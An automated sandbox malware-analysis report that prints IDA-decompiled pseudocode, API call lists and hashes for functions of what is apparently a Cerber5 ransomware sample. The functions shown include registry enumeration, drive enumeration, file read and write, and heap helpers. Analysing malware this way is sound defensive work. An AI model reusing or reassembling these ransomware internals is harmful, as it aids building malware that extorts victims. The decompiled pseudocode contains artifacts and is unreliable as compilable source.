0x00409d69
0x00409d76
0x00409d7b
0x00409d81
0x00409d81
0x00409d87
0x00409d8c
0x00409d8c
0x00409d90
0x00409d95
0x00409d9d
0x00409d9e
0x00409da4
0x00409da4
0x00409dac
0x00409dac
0x00000000

APIs

RtlInitializeCriticalSection.NTDLL(0042FAD4), ref: 00409C9A

Part of subcall function 0040692E: RegOpenKeyExW.ADVAPI32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
Part of subcall function 0040692E: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
Part of subcall function 0040692E: RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9
Part of subcall function 0040692E: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

wsprintfW.USER32 ref: 00409F8C
CharLowerBuffW.USER32(?,00000000), ref: 00409F9B
CreateWellKnownSid.ADVAPI32(00000016,00000000,0042FA80,0040FC68,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040A08B

Part of subcall function 00409518: CharLowerBuffW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004095C7

Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: BuffCharErrorLastLower$CloseCreateCriticalEnumInfoInitializeKnownOpenQuerySectionWelllstrcmpiwsprintf
String ID:
API String ID: 2837586674-0
Opcode ID: 8aeb2e36c9a525185ab6acb2a8042190fcaaa91a6e5e255f33483cd27a8564d9
Instruction ID: f53d3d57d72d2fba058dee37206852e67e00b2b4db81be835a0203e8b915a40b
Opcode Fuzzy Hash: 8aeb2e36c9a525185ab6acb2a8042190fcaaa91a6e5e255f33483cd27a8564d9
Instruction Fuzzy Hash: 7EA1B272A447069FD620BF65EC42F1B37A8AB44714F51043FF808BB2D3DA799D058A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040692E Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040692E(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				int _v12;
				void* _v16;
				short* _v20;
				void* __esi;
				long _t22;
				void* _t33;
				short* _t39;
				void* _t44;

				_t33 = __ecx;
				_t22 = RegOpenKeyExW(0x80000002, E0040591C(0x40d3ec, 0x38, 0xa9ebca9c), 0, 0x20119,  &_v16);
				if(_t22 == 0) {
					if(RegQueryInfoKeyW(_v16, 0, 0, 0, 0,  &_v12, 0, 0, 0, 0, 0, 0) != 0) {
						L12:
						return RegCloseKey(_v16);
					}
					_v12 = _v12 + 1;
					_t39 = E004053BD(_t33);
					if(_t39 == 0) {
						L11:
						goto L12;
					}
					_v5 = 0;
					_v20 = 0;
					while(RegEnumKeyW(_v16, _v20, _t39, _v12) == 0) {
						_t44 = E00406885(_v16, _t39);
						if(_t44 != 0) {
							_push(_a8);
							_push(_t44);
							if(_a4() != 0) {
								_v5 = 1;
							}
							E00405463(_t44);
						}
						_v20 = _v20 + 1;
						if(_v5 == 0) {
							continue;
						} else {
							break;
						}
					}
					E00405463(_t39);
					goto L11;
				}
				return _t22;
			}

0x0040692e
0x0040695b
0x00406963
0x00406982
0x004069e9
0x00000000
0x004069ec
0x00406984
0x00406992
0x00406996
0x004069e8
0x00000000
0x004069e8
0x00406998
0x0040699b
0x0040699f
0x004069bc
0x004069c2
0x004069c4
0x004069c7
0x004069cd
0x004069cf
0x004069cf
0x004069d3
0x004069d3
0x004069d8
0x004069de
0x00000000
0x00000000
0x00000000
0x00000000
0x004069de
0x004069e2
0x00000000
0x004069e7
0x004069f4

APIs

RegOpenKeyExW.ADVAPI32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9

Part of subcall function 00406885: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,00000000), ref: 004068A1
Part of subcall function 00406885: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?), ref: 004068D7
Part of subcall function 00406885: PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
Part of subcall function 00406885: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901
Part of subcall function 00406885: RegCloseKey.ADVAPI32(?), ref: 00406923

RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseOpenQuery$EnumEnvironmentExpandInfoPathSpacesStringsUnquoteValue
String ID:
API String ID: 3336427869-0
Opcode ID: af5da847c0a7c09ad53230747cdbb2741e9df9e1729206277d34d7450c28c80e
Instruction ID: 853463cecd8b6028bb46b6cb4b877976a71b5afdd9393abb8aaabce99423f380
Opcode Fuzzy Hash: af5da847c0a7c09ad53230747cdbb2741e9df9e1729206277d34d7450c28c80e
Instruction Fuzzy Hash: 75210272900118BFEB116BE49C85EEFBB7CEF00344F14407AF902B2181D7754E258B69

Uniqueness

Uniqueness Score: -1.00%

Function 004025E6 Relevance: 6.1, APIs: 4, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004025E6(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, long* _a8) {
				void* _v8;
				WCHAR* _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t17;
				long* _t20;
				void* _t28;
				long _t33;

				_t27 = __ecx;
				_push(_a4);
				_push(0x42fbc8);
				_t28 = 0;
				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
				_push( &_v12);
				if(E00405B0C(0, __ecx, 0, __esi, __eflags) != 0) {
					_push(__esi);
					_t17 = CreateFileW(_v12, 0x80000000, 1, 0, 3, 0, 0);
					_v8 = _t17;
					if(_t17 != 0xffffffff) {
						_t33 = GetFileSize(_t17, 0);
						_t20 = _a8;
						if(_t20 != 0) {
							 *_t20 = _t33;
						}
						_t28 = E004053BD(_t27);
						if(_t28 != 0) {
							if(ReadFile(_v8, _t28, _t33,  &_v16, 0) == 0 || _t33 != _v16) {
								E00405463(_t28);
								_t28 = 0;
								__eflags = 0;
							} else {
								 *((char*)(_t28 + _t33)) = 0;
							}
						}
						CloseHandle(_v8);
					}
					E00405463(_v12);
				}
				return _t28;
			}

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0040D17C,?,?,?,?,?,?,?,00000000), ref: 0040262F
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 0040263F
ReadFile.KERNEL32(004029D6,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000), ref: 00402668
CloseHandle.KERNEL32(004029D6,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00402688

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$ErrorLast$CloseCreateFreeHandleHeapReadSize
String ID:
API String ID: 1761772567-0
Opcode ID: f6665d2c2b839661bcf4aeea4b55f2da71593a807162cc5e5a3f96c83e2ff2b8
Instruction ID: bd1e91014a81025413ce5f3561b387066ac48bd53aee3230f565365039a3e6e7
Opcode Fuzzy Hash: f6665d2c2b839661bcf4aeea4b55f2da71593a807162cc5e5a3f96c83e2ff2b8
Instruction Fuzzy Hash: F31159B2900108BFDB206B65DD89EAF3B7CDB84354F110976F810F31D0EB769E048A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAFB Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E0040AAFB(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, WCHAR* _a8) {
				WCHAR* _v8;
				union _ULARGE_INTEGER _v12;
				WCHAR* _v16;
				union _ULARGE_INTEGER _v20;
				void* _v220;
				void* _v420;
				void* _v620;
				void* __edi;
				void* __ebp;
				void* _t51;

				_t51 = __edx;
				_v12.LowPart = 0;
				asm("stosd");
				_v20.LowPart = 0;
				asm("stosd");
				if(GetDiskFreeSpaceExW(_a8, 0,  &_v12,  &_v20) != 0 && E00402C54(_t51, _a4) != 0) {
					_push(0x64);
					StrFormatByteSizeW(_v12.LowPart, _v8,  &_v620);
					_push(0x64);
					StrFormatByteSizeW(_v20.LowPart, _v16,  &_v420);
					_push(0x64);
					asm("sbb ecx, [ebp-0xc]");
					StrFormatByteSizeW(_v12.LowPart - _v20.LowPart, _v8,  &_v220);
					_push( &_v220);
					_push( &_v420);
					_push( &_v620);
					_push(_a8);
					_push(E0040591C(0x40d920, 0x21, 0x44c051f2));
					_push(_a4);
					E00402B9B(__ebx, _t51,  &_v16, __esi);
				}
				asm("sbb edx, [ebp-0xc]");
				return _v12 - _v20;
			}

0x0040aafb
0x0040ab09
0x0040ab0f
0x0040ab10
0x0040ab16
0x0040ab2b
0x0040ab3e
0x0040ab4d
0x0040ab53
0x0040ab62
0x0040ab6b
0x0040ab7a
0x0040ab7f
0x0040ab8b
0x0040ab92
0x0040ab99
0x0040ab9a
0x0040abb1
0x0040abb2
0x0040abb5
0x0040abba
0x0040abc6
0x0040abcb

APIs

GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040AB23
StrFormatByteSizeW.SHLWAPI(00000000,00000000,?,00000064), ref: 0040AB4D
StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB62
StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB7F

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ByteFormatSize$DiskFreeSpace
String ID:
API String ID: 648141005-0
Opcode ID: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
Instruction ID: ed8ce472527b587452f6a98b297226058bf91ab61d3eb22b8839db4c947b5189
Opcode Fuzzy Hash: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
Instruction Fuzzy Hash: D021E576900119BFDF01DF94DD45EEEBB7ABB08300F0049AAB615B6190DB71AA588B51

Uniqueness

Uniqueness Score: -1.00%

Function 0040B08E Relevance: 6.1, APIs: 4, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040B08E(intOrPtr* __eax, void* __ecx, short* _a4, short* _a8) {
				int _v8;
				void* _v12;
				void* __esi;
				char* _t30;
				intOrPtr* _t34;

				_t28 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t34 = __eax;
				_t30 = 0;
				if(RegOpenKeyExW(0x80000002, _a4, 0, 0x20119,  &_v12) != 0) {
					L8:
					return _t30;
				} else {
					_v8 = 0;
					if(RegQueryValueExW(_v12, _a8, 0, 0, 0,  &_v8) == 0) {
						_t30 = E004053BD(_t28);
						if(_t30 != 0) {
							if(RegQueryValueExW(_v12, _a8, 0, 0, _t30,  &_v8) == 0) {
								if(_t34 != 0) {
									 *_t34 = _v8;
								}
							} else {
								E00405463(_t30);
								_t30 = 0;
							}
						}
					}
					RegCloseKey(_v12);
					goto L8;
				}
			}

0x0040b08e
0x0040b091
0x0040b092
0x0040b096
0x0040b0a7
0x0040b0b6
0x0040b114
0x0040b11a
0x0040b0b8
0x0040b0c2
0x0040b0d0
0x0040b0da
0x0040b0de
0x0040b0f5
0x0040b104
0x0040b109
0x0040b109
0x0040b0f7
0x0040b0f9
0x0040b0fe
0x0040b0fe
0x0040b0f5
0x0040b0de
0x0040b10e
0x00000000
0x0040b10e

APIs

RegOpenKeyExW.ADVAPI32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLastQueryValue$CloseFreeHeapOpen
String ID:
API String ID: 3207664046-0
Opcode ID: 4453bc25491b2a35416fc4862e288b1947e31ae3c9de3e4d4d85602174aa9640
Instruction ID: d330e1e9e1ceab0afd93f14912bc7271c4ca599fa294788e7f532a214b6da2e9
Opcode Fuzzy Hash: 4453bc25491b2a35416fc4862e288b1947e31ae3c9de3e4d4d85602174aa9640
Instruction Fuzzy Hash: 62115E72600518BFEB105FA1CC85DBFBBBDEB843D4B14007AF915E6250E7708E059BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0A4 Relevance: 6.1, APIs: 4, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A0A4() {
				char _v8;
				void* _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t17;
				short* _t19;
				short* _t26;
				signed int _t30;
				signed int _t31;
				void* _t32;
				void* _t33;

				_t17 = GetLogicalDrives();
				_t30 = 0;
				_v20 = _t17;
				_v28 = 0x80000002;
				_v24 = 0x80000001;
				_t31 = 0;
				do {
					_t19 = E0040591C(0x40d860, 0x3b, 0xf6d84de6);
					_t33 = _t33 + 0xc;
					if(RegOpenKeyExW( *(_t32 + _t31 * 4 - 0x18), _t19, 0, 0x20019,  &_v12) == 0) {
						_v8 = 0;
						_v16 = 4;
						_t26 = E0040591C(0x40d89c, 8, 0x19e52868);
						_t33 = _t33 + 0xc;
						if(RegQueryValueExW(_v12, _t26, 0, 0,  &_v8,  &_v16) == 0 && _v8 != 0) {
							_t30 = _t30 | _v8;
						}
						RegCloseKey(_v12);
					}
					_t31 = _t31 + 1;
				} while (_t31 < 2);
				return  !_t30 & _v20;
			}

0x0040a0ad
0x0040a0b5
0x0040a0b7
0x0040a0ba
0x0040a0c1
0x0040a0c8
0x0040a0ca
0x0040a0e0
0x0040a0e5
0x0040a0f5
0x0040a10d
0x0040a110
0x0040a117
0x0040a11c
0x0040a12b
0x0040a132
0x0040a132
0x0040a138
0x0040a138
0x0040a13e
0x0040a13f
0x0040a14f

APIs

GetLogicalDrives.KERNEL32 ref: 0040A0AD
RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID:
API String ID: 2666887985-0
Opcode ID: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
Instruction ID: 31f235d855805f4f5877ecc24470a71aed6712d684aed6bf08466ec839675859
Opcode Fuzzy Hash: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
Instruction Fuzzy Hash: 1E119EB2E40218BFEB10AFE19C85EAFBBBDEB44344F104076E914F2181D7745A198B99

Uniqueness

Uniqueness Score: -1.00%

Function 004053CA Relevance: 6.1, APIs: 4, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004053CA(void* __eax, void* __ecx, void* __edi) {
				long _v8;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t12;
				void* _t17;
				void* _t20;
				void* _t27;
				void* _t29;
				void* _t32;

				_t27 = __edi;
				_t22 = __ecx;
				_push(__ecx);
				_t29 = __eax;
				_v8 = GetLastError();
				if(E0040521D() == 0) {
					E004052DB(_t22);
				}
				_t20 = 0;
				if(_t29 == 0) {
					L12:
					SetLastError(_v8);
					return _t20;
				} else {
					_t32 = E004051F5(_t22, _t29 + 2);
					_t35 = _t27;
					if(_t27 == 0) {
						L9:
						_t4 = _t32 + 0xc; // 0xc
						_t12 = RtlAllocateHeap( *0x42f808, 8, _t4);
						L10:
						__eflags = _t12;
						if(_t12 != 0) {
							_t20 = E00405329(_t12, _t32);
						}
						goto L12;
					}
					_push(_t27);
					if(E0040522F(0, _t32, _t35) == 0) {
						goto L12;
					}
					if(_t32 > E004053C6(_t27)) {
						_t17 = _t27 - 8;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L9;
						}
						_t3 = _t32 + 0xc; // 0xc
						_t12 = RtlReAllocateHeap( *0x42f808, 8, _t17, _t3);
						goto L10;
					}
					_t20 = _t27;
					goto L12;
				}
			}

APIs

GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2

Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D

SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457

Part of subcall function 004052DB: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C

RtlReAllocateHeap.NTDLL(00000008,?,0000000C), ref: 0040542D
RtlAllocateHeap.NTDLL(00000008,0000000C), ref: 00405441

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCurrentErrorLastProcess$CreateInformation
String ID:
API String ID: 2700697227-0
Opcode ID: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
Instruction ID: 60861b4cb21ab03a9d491da3f7eb1cca335a308e405506aebc7ad154f13da930
Opcode Fuzzy Hash: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
Instruction Fuzzy Hash: A101A131600E019BDB217BA5AC85BAB73A8DB00745744007FE801BA2D2EBB99C895E5C

Uniqueness

Uniqueness Score: -1.00%

Function 00402522 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00402522(void* __ecx, long __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				WCHAR* _v8;
				long _v12;
				void* __ebx;
				void* __ebp;
				long _t20;
				void* _t25;
				void* _t31;

				_t31 = __eflags;
				_push(__ecx);
				_push(__ecx);
				E00404CDC();
				_push(_a4);
				_t20 = 0;
				_push(0x42fbc8);
				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
				_push( &_v8);
				if(E00405B0C(0, __ecx, __edi, __esi, _t31) != 0) {
					_push(__esi);
					_t25 = CreateFileW(_v8, 0x40000000, 1, 0, 2, 0, 0);
					if(_t25 != 0xffffffff) {
						if(WriteFile(_t25, _a8, __edi,  &_v12, 0) != 0 && __edi == _v12) {
							_t20 = 1;
						}
						FlushFileBuffers(_t25);
						CloseHandle(_t25);
					}
					E00405463(_v8);
				}
				return _t20;
			}

0x00402522
0x00402525
0x00402526
0x00402528
0x0040252d
0x00402530
0x00402532
0x0040254b
0x0040254f
0x0040255a
0x0040255c
0x00402572
0x00402577
0x0040258b
0x00402592
0x00402592
0x00402595
0x0040259c
0x0040259c
0x004025a5
0x004025aa
0x004025af

APIs

Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(0042FBC8,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000), ref: 00404CE8
Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(0042FBC8,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(0042FBC8,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040256C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402583
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402595
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 0040259C

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Create$AttributesBuffersCloseDirectoryFlushHandlePathRootSkipWrite
String ID:
API String ID: 1235120676-0
Opcode ID: d437232638390c0ba0631372b31982ea3e96c4a6a7e581e09a36093f75ecfaa2
Instruction ID: 1381f6fc85793e5c8f5f04911c0c0407d55afb8d8fa61240edf39063a8e535f6
Opcode Fuzzy Hash: d437232638390c0ba0631372b31982ea3e96c4a6a7e581e09a36093f75ecfaa2
Instruction Fuzzy Hash: FE01D4B55411187FEB206BA5DD8BEDF3B2CDF04354F100576F901B21D1E6B99E058AAC

Uniqueness

Uniqueness Score: -1.00%

Function 004049F6 Relevance: 6.0, APIs: 4, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004049F6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t25;
				void* _t26;

				_push(0x10);
				_push(0x40d9d8);
				E0040B654(__ebx, __edi, __esi);
				_t25 = __ecx;
				 *((intOrPtr*)(_t26 - 0x1c)) = 0;
				 *(_t26 - 0x20) = GetLastError();
				 *(_t26 - 4) = 0;
				if(E004049E4(_t25) == 0) {
					 *0x40f1d8(_t25 + 8);
					 *_t25 = GetCurrentProcessId();
					 *((intOrPtr*)(_t25 + 4)) = 0;
					 *((intOrPtr*)(_t26 - 0x1c)) = 1;
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				SetLastError( *(_t26 - 0x20));
				return E0040B68F( *((intOrPtr*)(_t26 - 0x1c)));
			}

0x004049f6
0x004049f8
0x004049fd
0x00404a02
0x00404a06
0x00404a0f
0x00404a12
0x00404a1e
0x00404a24
0x00404a30
0x00404a32
0x00404a35
0x00404a35
0x00404a45
0x00404a4c
0x00404a5a

APIs

GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09

Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4

RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CurrentErrorLastProcess$CriticalInitializeSection
String ID:
API String ID: 666570305-0
Opcode ID: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
Instruction ID: 6239d71e1b6d1d9b6d3a873080a6ec753aa0bdfafe20bcce74541f407a615959
Opcode Fuzzy Hash: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
Instruction Fuzzy Hash: EDF01DB5C00205DBCB20EF65D90969EBBB0BF84310F10457BE551B36A0CB790945CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABB Relevance: 6.0, APIs: 4, Instructions: 28
threadCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00404ABB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				void* _t22;
				void* _t23;

				_push(0xc);
				_push(0x40d9f8);
				E0040B654(__ebx, __edi, __esi);
				_t22 = __ecx;
				 *(_t23 - 0x1c) = GetLastError();
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				_t11 = E004049E4(_t22);
				_t25 = _t11;
				if(_t11 != 0 || E004049F6(__ebx, _t22, __edi, _t22, _t25) != 0) {
					 *0x40f1dc(_t22 + 8);
					 *((intOrPtr*)(_t22 + 4)) = GetCurrentThreadId();
				}
				 *(_t23 - 4) =  *(_t23 - 4) | 0xffffffff;
				SetLastError( *(_t23 - 0x1c));
				return E0040B68F(_t14);
			}

0x00404a5b
0x00404a5d
0x00404a62
0x00404a67
0x00404a6f
0x00404a72
0x00404a77
0x00404a7d
0x00404a7f
0x00404a90
0x00404a9c
0x00404a9c
0x00404aa8
0x00404aaf
0x00404aba

APIs

GetLastError.KERNEL32(0040D9F8,0000000C,00405854,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A69

